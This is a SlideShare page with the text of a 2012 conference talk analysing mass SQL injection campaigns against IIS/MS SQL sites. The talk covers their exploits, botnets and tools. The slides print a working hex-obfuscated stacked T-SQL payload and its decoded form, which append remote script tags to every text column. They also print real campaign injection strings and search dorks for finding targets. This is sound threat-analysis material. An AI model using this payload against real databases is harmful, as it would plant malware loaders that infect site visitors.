Analysis of mass SQL injection attacks

3,857 views

Published on

These are the slides from a talk "Analysis of mass SQL injection attacks" held at FSec 2012 conference (Croatia / Varazdin 21st September 2012) by Miroslav Stampar

Published in: Technology
0 Comments
5 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
3,857
On SlideShare
0
From Embeds
0
Number of Embeds
14
Actions
Shares
0
Downloads
61
Comments
0
Likes
5
Embeds 0
No embeds

No notes for slide

Analysis of mass SQL injection attacks

  1. 1. Analysis of mass SQL injection attacks Miroslav Štampar (dev@sqlmap.org)
  2. 2. FUD (Fear, Uncertainty, Doubt) “A new virus is making the rounds and is wreaking havoc on the Internet” “Whatever language is used to write to the database, all SQL databases use the same basic formulas for writing and retrieving data” “Targets that bottleneck in the technology, making it platform-independent… Whether the machine is using ASP, ColdFusion, JSP, PHP, or whatever else” “...blazing through the internet, infecting more than half a million domains around the world to date and as many as 1.5 million URLs”FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 2
  3. 3. Google is (not) your friend (1)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 3
  4. 4. Google is (not) your friend (2)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 4
  5. 5. Google is (not) your friend (3)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 5
  6. 6. Whats it all about? Platform dependent (IIS/ASP(.NET)) DBMS dependent (Microsoft SQL Server) Highly automated (tool-based) approach Popular SQL enumeration tools with or without Google search capability dont count (e.g. sqlmap, Havij, Pangolin) Infection(s) counting in thousands of domains (not millions as previously believed) Dummy as it can be (usually one request per target) In short: malware distributionFSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 6
  7. 7. Modus operandi Get hands on couple of 1-day exploits Blindly inject SQL payload carrying malicious content (<script>, <iframe>, etc.) into content tables of as much as possible vulnerable web servers Leverage exploit(s) and/or users lack of technical knowledge to install malware (spyware, trojans, etc.) to visitors computer Profit(???) - (DEFCON 18 – Garry Pejski: “My Life As A Spyware Developer”)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 7
  8. 8. Sample leveraged exploits  CVE-2012-4681 Oracle Java 7 Update 6  CVE-2012-1889 Microsoft XML Core Services  CVE-2012-1723 Java Runtime Environment  CVE-2012-0507 Java Runtime Environment  CVE-2011-3544 Java Runtime Environment  CVE-2011-2110 Adobe Flash Player  CVE-2011-0611 Adobe Flash Player  CVE-2010-3552 New Java Plug-in  CVE-2010-0188 Adobe Reader  etc.FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 8
  9. 9. Notable members (1) Lilupophilupop (sl.php)  "></title><script src="http://lilupophilupop.com/sl.php"></script><!-- Nikjju (r.php)  <script src=http://nikjju.com/r.php></script> Robint (u.js)  <script src=http://ww.robint.us/u.js></script> LizaMoon (ur.php)  </title><script src=http://lizamoon.com/ur.php></script> Jjghui (urchin.js)  </title><script src=http://jjghui.com/urchin.js></script>FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 9
  10. 10. Notable members (2)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 10
  11. 11. Notable members (3)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 11
  12. 12. Generic payload (obfuscated)GET /vuln.asp?param=1;DECLARE @S VARCHAR(4000);SET@S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220............................................................5845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E63686B6164772E636F6D2F622E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220 AS VARCHAR(4000));EXEC(@S);--FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 12
  13. 13. Generic payload (decoded)DECLARE @t VARCHAR(255), @c VARCHAR(255)DECLARE table_cursor CURSOR FORSELECT a.name, b.name FROM sysobjects a,syscolumns b WHEREa.id=b.id and a.xtype=u and (b.xtype=99 or b.xtype=35 orb.xtype=231 or b.xtype=167) /* NTEXT, TEXT, NVARCHAR,VARCHAR */OPEN table_cursor FETCH NEXT FROM table_cursor INTO @t,@cWHILE(@@FETCH_STATUS=0) BEGINEXEC(UPDATE [+@t+] SET [+@c+]=RTRIM(CONVERT(VARCHAR,[+@c+]))+<scriptsrc=http://www.attacker.com/malicious.js></script>)FETCH NEXT FROM table_cursor INTO @t,@cENDCLOSE table_cursorDEALLOCATE table_cursorFSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 13
  14. 14. Analysis (1) Piggy backing (stacked) SQL injection Obfuscated SQL code (hex encoded) Decoded code dynamically executed with T- SQL EXEC command Usage of cursor for update Iterating over all tables / all text-like columns Appending malicious content (e.g. <script src=...) to all matched column entries using UPDATE statementFSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 14
  15. 15. Analysis (2)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 15
  16. 16. Analysis (3)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 16
  17. 17. Example (1) - FAILFSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 17
  18. 18. Example (2) - FAILFSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 18
  19. 19. Example (3) - FAILFSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 19
  20. 20. Example (4) – CLUSTER FAILFSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 20
  21. 21. Example (5) - SUCCESSFSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 21
  22. 22. Example (6) - SUCCESSFSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 22
  23. 23. Asprox (1) Spam botnet used for phishing scams (>10K bots) Developed over years Interesting update “msscntr32.exe” (SQL attack tool) Google search for targets (e.g. inurl:".asp") Launch SQL injection attacks against resulting pagesFSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 23
  24. 24. Asprox (2)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 24
  25. 25. CLI (1) Standalone executable Rare beast (Chinese underground forums?) Google search for targets (e.g.: inurl:".asp" inurl:"a=") Configurable malicious tag that will be inserted (originally <script src=http://www.2117966.net/fuckjp.js></s cript>) Wild guess is that attackers are being paid for using the tool (backcall to *.cn/pay.asp? SN=...)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 25
  26. 26. CLI (2)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 26
  27. 27. Sample tool (1)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 27
  28. 28. Sample tool (2)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 28
  29. 29. Sample tool (3)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 29
  30. 30. Sample tool (4)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 30
  31. 31. Sample tool (5)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 31
  32. 32. Sample run (1)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 32
  33. 33. Sample run (2)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 33
  34. 34. Sample run (3)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 34
  35. 35. Sample run (4)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 35
  36. 36. Sample run (5)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 36
  37. 37. Sample run (6)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 37
  38. 38. Sample run (7)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 38
  39. 39. Sample run (8)FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 39
  40. 40. Questions?FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 40

×